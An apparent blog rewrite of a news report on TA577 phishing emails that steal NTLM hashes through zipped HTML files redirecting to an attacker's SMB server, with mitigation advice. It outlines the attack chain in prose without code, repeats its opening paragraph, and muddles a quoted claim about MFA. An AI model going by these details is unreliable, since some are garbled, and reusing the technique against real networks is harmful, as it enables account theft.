TA577 Shifts Tactics with Phishing Emails to Steal NTLM Hashes
The notorious hacking group TA577 has recently made a strategic shift in their tactics by utilizing phishing emails to steal NT LAN Manager (NTLM) authentication hashes, ultimately leading to account hijacks. Known as an initial access broker (IAB) and previously associated with Qbot and Black Basta ransomware infections, TA577 has caught the attention of cybersecurity experts once again.
The notorious hacking group TA577 has recently made a strategic shift in their tactics by utilizing phishing emails to steal NT LAN Manager (NTLM) authentication hashes, ultimately leading to account hijacks. Known as an initial access broker (IAB) and previously associated with Qbot and Black Basta ransomware infections, TA577 has caught the attention of cybersecurity experts once again.
New Attack Waves Targeting NTLM Hashes
Email security firm Proofpoint has reported that TA577 has been showing a preference for deploying Pikabot, but recent attack waves on February 26 and 27, 2024, have demonstrated a different approach. These campaigns targeted thousands of organizations worldwide, aiming to steal employees' NTLM hashes, which are crucial for Windows authentication and session security.
NTLM hashes can be exploited for offline password cracking or used in "pass-the-hash" attacks, allowing attackers to authenticate to remote servers without cracking the password. This stolen information can enable attackers to escalate privileges, hijack accounts, access sensitive data, evade security measures, and move laterally within a compromised network.
Phishing Emails as the Entry Point
The new campaign initiated by TA577 involves phishing emails that mimic replies to ongoing discussions, a tactic known as thread hijacking. These emails contain unique ZIP archives with HTML files that automatically connect to an external Server Message Block (SMB) server using META refresh HTML tags.
When a Windows device connects to the server, it triggers an NTLMv2 Challenge/Response, allowing the attacker-controlled server to steal the NTLM authentication hashes. Proofpoint's report highlights that the malicious HTML files were delivered in ZIP archives to generate local files on the host, making them more effective in bypassing security measures.
Defensive Measures and Recommendations
Cybersecurity professionals emphasize the importance of implementing defensive measures to prevent such attacks. Brian from Pittsburgh notes that disabling multi-factor authentication on accounts is a prerequisite for threat actors to leverage stolen hashes for network breaches. Vulnerability researcher Will Dormann suggests that the stolen hashes might be used for reconnaissance to identify valuable targets.
To mitigate TA577 attacks, organizations can consider configuring firewalls to block outbound SMB connections, implementing email filtering to block messages with zipped HTML files, and restricting NTLM outgoing traffic to remote servers using Windows group policy settings. For Windows 11 users, Microsoft has introduced additional security features to block NTLM-based attacks over SMBs, offering a more robust defense against such threats.
In the ever-evolving landscape of cybersecurity threats, staying vigilant and proactive in implementing security measures is crucial to safeguarding sensitive information and preventing unauthorized access to networks. TA577's shift in tactics underscores the need for organizations to adapt and strengthen their defenses against sophisticated cyber threats.
Hey, I'm Saadat Qureshi, your guide through the exciting worlds of education and technology. Originally from Karachi and a proud alum of the University of Birmingham, I'm now back in Karachi, Pakistan, exploring the intersection of learning and tech. Stick around for my fresh takes on the digital revolution! Connect With Me